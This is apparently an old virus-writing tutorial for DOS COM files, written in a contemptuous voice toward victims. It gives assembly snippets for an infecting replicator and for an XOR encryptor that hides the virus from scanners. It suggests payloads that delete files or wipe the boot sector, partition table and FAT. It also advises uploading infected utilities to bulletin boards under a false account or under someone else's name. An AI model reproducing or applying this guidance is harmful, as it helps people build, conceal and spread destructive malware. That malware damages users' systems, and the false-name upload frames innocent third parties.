assembly language coded virus supri (supreme v1)
TRANSCRIPT
VIRUS ARE WONDROUS CREATIONS WRITTEN FOR THE SOLE
PURPOSE OF SPREADING AND DESTROYING THE SYSTEMS OF
UNSUSPECTING FOOLS. THIS ELIMINATES THE SYSTEMS OF
SIMPLETONS WHO CAN'T TELL THAT THERE IS A PROBLEM
WHEN A 100 BYTE FILE SUDDENLY BLOSSOMS INTO A 1,000
BYTE FILE. DUH. THESE LOW-LIFES DO NOT DESERVE TO EXIST,
SO IT IS OUR SACRED DUTY TO WIPE THEIR HARD DRIVES OFF
THE FACE OF THE EARTH. IT IS A SIMPLE MATTER OF SPEEDING
ALONG SURVIVAL OF THE FITTEST
THERE ARE THREE TYPES OF VIRUS:
1) TINY VIRUS (UNDER 500 BYTES) WHICH ARE DESIGNED TO BE
UNDETECTABLE DUE TO THEIR SMALL SIZE. TINY IS ONE SUCH VIRUS. THEY
ARE GENERALLY VERY SIMPLE BECAUSE THEIR CODE LENGTH IS SO LIMITED.
2) LARGE VIRUS (OVER 1,500 BYTES) WHICH ARE DESIGNED TO BE
UNDETECTABLE BECAUSE THEY COVER THEIR TRACKS VERY WELL (ALL THAT
CODE DOES HAVE A USE!). THE BEST EXAMPLE OF THIS IS THE WHALE VIRUS,
WHICH IS PERHAPS THE BEST 'STEALTH' VIRUS IN EXISTENCE.
3) OTHER VIRUS WHICH ARE NOT DESIGNED TO BE HIDDEN AT ALL (THE
WRITERS DON'T GIVE A SHIT). THE COMMON VIRUS IS LIKE THIS. ALL
OVERWRITING VIRUS ARE IN THIS CATEGORY.
PART OF VIRUSA VIRUS MAY BE DIVIDED INTO THREE PARTS: THE REPLICATOR,
THE CONCEALER, AND THE BOMB. THE REPLICATOR PART
CONTROLS THE SPREAD OF THE VIRUS TO OTHER FILES, THE
CONCEALER KEEPS THE VIRUS FROM BEING DETECTED, AND
THE BOMB ONLY EXECUTES WHEN THE ACTIVATION CONDITIONS
OF THE VIRUS (MORE ON THAT LATER) ARE SATISFIED.
THE REPLICATOR
THE JOB OF THE REPLICATOR IS TO SPREAD THE VIRUS THROUGHOUT THE
SYSTEM OF THE CLOD WHO HAS CAUGHT THE VIRUS. HOW DOES IT DO THIS
WITHOUT DESTROYING THE FILE IT INFECTS? THE EASIEST TYPE OF
REPLICATOR INFECTS COM FILES. IT FIRST SAVES THE FIRST FEW BYTES OF
THE INFECTED FILE. IT THEN COPIES A SMALL PORTION OF ITS CODE TO THE
BEGINNING OF THE FILE, AND THE REST TO THE END.
THE UNINFECTED FILE THE VIRUS CODE
IN THE DIAGRAM, P1 IS PART 1 OF THE FILE, P2 IS PART 2 OF THE FILE, AND
V1 AND V2 ARE PARTS 1 AND 2 OF THE VIRUS. NOTE THAT THE SIZE OF P1
SHOULD BE THE SAME AS THE SIZE OF V1, BUT THE SIZE OF P2 DOESN'T
NECESSARILY HAVE TO BE THE SAME SIZE AS V2. THE VIRUS FIRST SAVES P1
AND COPIES IT TO THE EITHER 1) THE END OF THE FILE OR 2) INSIDE THE
CODE OF THE VIRUS. LET'S ASSUME IT COPIES THE CODE TO THE END OF THE
FILE. THE FILE NOW LOOKS LIKE:
| P1 | P2 | | V1 | V2 |
| P1 | P2 | P1 |
THEN, THE VIRUS COPIES THE FIRST PART OF ITSELF TO THE
BEGINNING OF THE FILE.
FINALLY, THE VIRUS COPIES THE SECOND PART OF ITSELF TO
THE END OF THE FILE. THE FINAL, INFECTED FILE LOOKS LIKE
THIS:
THE QUESTION IS: WHAT THE THING DO V1 AND V2 DO? V1
TRANSFERS CONTROL OF THE PROGRAM TO V2. THE CODE TO
DO THIS IS SIMPLE.
| V1 | P2 | P1 |
| V1 | P2 | P1 | V2|
JMP FAR PTR DUH ; TAKES FOUR BYTESDUH DW V2_START ; TAKES TWO BYTES
DUH IS A FAR POINTER (SEGMENT:OFFSET) POINTING TO THE FIRST
INSTRUCTION OF V2. NOTE THAT THE VALUE OF DUH MUST BE CHANGED TO
REFLECT THE LENGTH OF THE FILE THAT IS INFECTED. FOR EXAMPLE, IF THE
ORIGINAL SIZE OF THE PROGRAM IS 79 BYTES, DUH MUST BE CHANGED SO
THAT THE INSTRUCTION AT CS:[155H] IS EXECUTED. THE VALUE OF DUH IS
OBTAINED BY ADDING THE LENGTH OF V1, THE ORIGINAL SIZE OF THE
INFECTED FILE, AND 256 (TO ACCOUNT FOR THE PSP). IN THIS CASE, V1 = 6
AND P1 + P2 = 79, SO 6 + 79 + 256 = 341 DECIMAL (155 HEX).
V2 CONTAINS THE REST OF THE CODE, I.E. THE STUFF THAT DOES
EVERYTHING ELSE. THE LAST PART OF V2 COPIES P1 OVER V1 (IN
MEMORY, NOT ON DISK) AND THEN TRANSFERS CONTROL TO THE
BEGINNING OF THE FILE (IN MEMORY). THE ORIGINAL PROGRAM WILL
THEN RUN HAPPILY AS IF NOTHING HAPPENED. THE CODE TO DO THIS
IS ALSO VERY SIMPLE.
MOV SI, V2_START ; V2_START IS A LABEL MARKING WHERE V2 STARTSSUB SI, V1_LENGTH ; GO BACK TO WHERE P1 IS STORED
MOV DI, 0100H ; ALL COM FILES ARE LOADED @ CS:[100H] IN MEMORY MOV CX, V1_LENGTH ; MOVE CX BYTES REP MOVSB ; DS:[SI] -> ES:[DI]
MOV DI, 0100H JMP DI
THIS CODE ASSUMES THAT P1 IS LOCATED JUST BEFORE V2, AS IN:
P1_STORED_HERE:
.
.
.
V2_START:
IT ALSO ASSUMES ES EQUALS CS. IF THESE ASSUMPTIONS ARE FALSE,
CHANGE THE CODE ACCORDINGLY. HERE IS AN EXAMPLE:
PUSH CS ; STORE CSPOP ES ; AND MOVE IT TO ES; NOTE MOV ES, CS IS NOT A VALID INSTRUCTION MOV SI, P1_START ; MOVE FROM WHERE EVER P1 IS STOREDMOV DI, 0100H ; TO CS:[100H] MOV CX, V1_LENGTH REP MOVSB MOV DI, 0100H JMP DI
V1_START:
JMP FAR PTR DUH DUH
DW V2_START
V1_END:
P2_START:
P2_END:
P1_START:
; FIRST PART OF THE PROGRAM STORED HERE FOR FUTURE USE
P1_END:
V2_START:
; REAL STUFF
V2_END:
V1_LENGTH EQU V1_END - V1_START
THAT'S ALL THERE IS TO INFECTING A COM FILE WITHOUT DESTROYING IT!
CONCEALERTHIS IS THE PART WHICH CONCEALS THE PROGRAM FROM NOTICE BY THE
EVERYDAY USER AND VIRUS SCANNER. THE SIMPLEST FORM OF
CONCEALMENT IS THE ENCRYPTOR. THE CODE FOR A SIMPLE XOR
ENCRYPTION SYSTEM FOLLOWS:
ENCRYPT_VAL DB ?DECRYPT:ENCRYPT: MOV AH, ENCRYPT_VALMOV CX, PART_TO_ENCRYPT_END - PART_TO_ENCRYPT_STARTMOV SI, PART_TO_ENCRYPT_STARTMOV DI, SIXOR_LOOP: LODSB ; DS:[SI] -> ALXOR AL, AHSTOSB ; AL -> ES:[DI] LOOP XOR_LOOPRET
NOTE THE ENCRYPTION AND DECRYPTION PROCEDURES ARE THE SAME. THIS
IS DUE TO THE WEIRD NATURE OF XOR. YOU CAN CALL THESE PROCEDURES
FROM ANYWHERE IN THE PROGRAM, BUT MAKE SURE YOU DO NOT CALL IT
FROM A PLACE WITHIN THE AREA TO BE ENCRYPTED, AS THE PROGRAM
WILL CRASH. WHEN WRITING THE VIRUS, SET THE ENCRYPTION VALUE TO 0.
PART_TO_ENCRYPT_START AND PART_TO_ENCRYPT_END SANDWICH THE
AREA YOU WISH TO ENCRYPT. USE A CALL DECRYPT IN THE BEGINNING OF V2
TO UNENCRYPT THE FILE SO YOUR PROGRAM CAN RUN. WHEN INFECTING A
FILE, FIRST CHANGE THE ENCRYPT_VAL, THEN CALL ENCRYPT, THEN WRITE
V2 TO THE END OF THE FILE, AND CALL DECRYPT. MAKE SURE THIS PART
DOES NOT LIE IN THE AREA TO BE ENCRYPTED!!!
THE BOMB SO NOW ALL THE BORING STUFF IS OVER. THE NASTINESS IS CONTAINED
HERE. THE BOMB PART OF THE VIRUS DOES ALL THE
DELETION/SLOWDOWN/ETC WHICH MAKE VIRII SO ANNOYING. SET SOME
ACTIVATION CONDITIONS OF THE VIRUS. THIS CAN BE ANYTHING, RANGING
FROM WHEN IT'S YOUR BIRTHDAY TO WHEN THE VIRUS HAS INFECTED 100
FILES. WHEN THESE CONDITIONS ARE MET, THEN YOUR VIRUS DOES THE
GOOD STUFF. SOME SUGGESTIONS OF POSSIBLE BOMBS: 1) SYSTEM
SLOWDOWN - EASILY HANDLED BY TRAPPING AN INTERRUPT AND CAUSING A
DELAY WHEN IT ACTIVATES. 2) FILE DELETION - DELETE ALL ZIP FILES ON THE
DRIVE. 3) MESSAGE DISPLAY - DISPLAY A NICE MESSAGE SAYING SOMETHING
TO THE EFFECT OF "YOU ARE FUCKED." 4) KILLING/REPLACING THE
PARTITION TABLE/BOOT SECTOR/FAT OF THE HARD DRIVE - THIS IS VERY
NASTY, AS MOST DIMWITS CANNOT FIX THIS.
OFFSET PROBLEMS THERE IS ONE CAVEAT REGARDING CALCULATION OF OFFSETS. AFTER YOU
INFECT A FILE, THE LOCATIONS OF VARIABLES CHANGE. YOU MUST ACCOUNT
FOR THIS. ALL RELATIVE OFFSETS CAN STAY THE SAME, BUT YOU MUST ADD
THE FILE SIZE TO THE ABSOLUTE OFFSETS OR YOUR PROGRAM WILL NOT
WORK. THIS IS THE MOST TRICKY PART OF WRITING VIRUS AND TAKING
THESE INTO ACCOUNT CAN OFTEN GREATLY INCREASE THE SIZE OF A VIRUS.
THIS IS VERY IMPORTANT AND YOU SHOULD BE SURE TO UNDERSTAND THIS
BEFORE ATTEMPTING TO WRITE A NONOVERWRITING VIRUS!
TESTING TESTING VIRII IS A DANGEROUS YET ESSENTIAL PART OF THE VIRUS
CREATION PROCESS. THIS IS TO MAKE CERTAIN THAT PEOPLE *WILL* BE HIT
BY THE VIRUS AND, HOPEFULLY, WIPED OUT. TEST THOROUGHLY AND MAKE
SURE IT ACTIVATES UNDER THE CONDITIONS. IT WOULD BE GREAT IF
EVERYONE HAD A SECOND COMPUTER TO TEST THEIR VIRII OUT, BUT, OF
COURSE, THIS IS NOT THE CASE. SO IT IS ESSENTIAL THAT YOU KEEP
BACKUPS OF YOUR FILES, PARTITION, BOOT RECORD, AND FAT. NORTON IS
HANDY IN THIS DOING THIS. DO NOT DISREGARD THIS ADVICE (EVEN THOUGH
I KNOW THAT YOU WILL ANYWAY) BECAUSE YOU WILL BE HIT BY YOUR OWN
VIRII. WHEN I WROTE MY FIRST VIRUS, MY SYSTEM WAS TAKEN DOWN FOR
TWO DAYS BECAUSE I DIDN'T HAVE GOOD BACKUPS. LUCKILY, THE VIRUS
WAS NOT OVERLY DESTRUCTIVE. BACKUPS MAKE SENSE! LEECH A BACKUP
PROGRAM FROM YOUR LOCAL PIRATE BOARD! I FIND A RAMDRIVE IS OFTEN
HELPFUL IN TESTING VIRII, AS THE DAMAGE IS NOT PERMANENT. RAMDRIVES
ARE ALSO USEFUL FOR TESTING TROJANS, BUT THAT IS THE TOPIC OF
ANOTHER FILE...
DISTRIBUTIONTHIS IS ANOTHER FUN PART OF VIRUS WRITING. IT INVOLVES SENDING YOUR
BRILLIANTLY-WRITTEN PROGRAM THROUGH THE PHONE LINES TO YOUR
LOCAL, UNSUSPECTING BULLETIN BOARDS. WHAT YOU SHOULD DO IS INFECT
A FILE THAT ACTUALLY DOES SOMETHING (LEECH A USEFUL UTILITY FROM
ANOTHER BOARD), INFECT IT, AND UPLOAD IT TO A PLACE WHERE IT WILL BE
DOWNLOADED BY USERS ALL OVER. THE BEST THING IS THAT IT WON'T BE
DETECTED BY PUNY SCANNER-WANNA-BES BY MCAFFEE, SINCE IT IS NEW!
OH YEAH, MAKE SURE YOU ARE USING A FALSE ACCOUNT (DUH). BETTER YET,
MAKE A FALSE ACCOUNT WITH THE NAME/PHONE NUMBER OF SOMEONE
YOU DON'T LIKE AND UPLOAD THE INFECTED FILE UNDER THE HIS NAME. YOU
CAN CALL BACK FROM TIME TO TIME AND USE A DOOR SUCH AS ZDOOR TO
CHECK THE SPREAD OF THE VIRUS. THE MORE WHO DOWNLOAD, THE MORE
WHO SHARE IN THE EXPERIENCE OF YOUR VIRUS!